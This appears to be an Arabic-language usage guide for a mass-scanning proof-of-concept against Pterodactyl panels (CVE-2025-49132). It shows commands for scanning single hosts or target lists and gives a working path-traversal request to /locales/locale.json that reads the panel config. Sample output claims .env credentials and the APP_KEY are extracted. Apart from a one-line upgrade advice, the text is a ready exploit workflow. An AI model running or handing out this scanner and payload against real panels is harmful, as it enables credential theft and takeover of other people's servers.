
Pterodactyl لوحة CVE-2025-49132 الكشف الجماعي ☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f قائمة_الأهداف.txt
python3 CVE-2025-49132_poc.py -f قائمة_الأهداف.txt -o نتائج_المسح.txt
عند وجود ثغرة:
[+] توجد ثغرة: تأكيد الثغرة
تفاصيل الثغرة:
• نوع الثغرة: اجتياز المسار
• متجه الهجوم: الوصول إلى /locales/locale.json عبر معامل اجتياز المسار
• رابط الاستغلال: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
التأثير المحتمل:
• قراءة بيانات الاعتماد في ملف إعدادات اللوحة (.env)
• استخراج معلومات حساسة من قاعدة البيانات
• الوصول إلى ملفات خوادم الألعاب التي تديرها اللوحة
مفتاح APP_KEY المستخرج: base64{{your_secret_key_here}}
توصية الإصلاح: الترقية فورًا إلى Pterodactyl v1.11.11 أو إصدار أحدث
عند عدم وجود ثغرة:
[-] لا توجد ثغرة: لا توجد ثغرة (رمز الحالة: 404)
ملخص المسح:
ملخص المسح:
• إجمالي الأهداف الممسوحة: 5
• الأهداف التي بها ثغرات: 2
• الأهداف الآمنة: 3
[!] خطير: تم اكتشاف أنظمة بها ثغرات! يلزم اتخاذ إجراء فوري.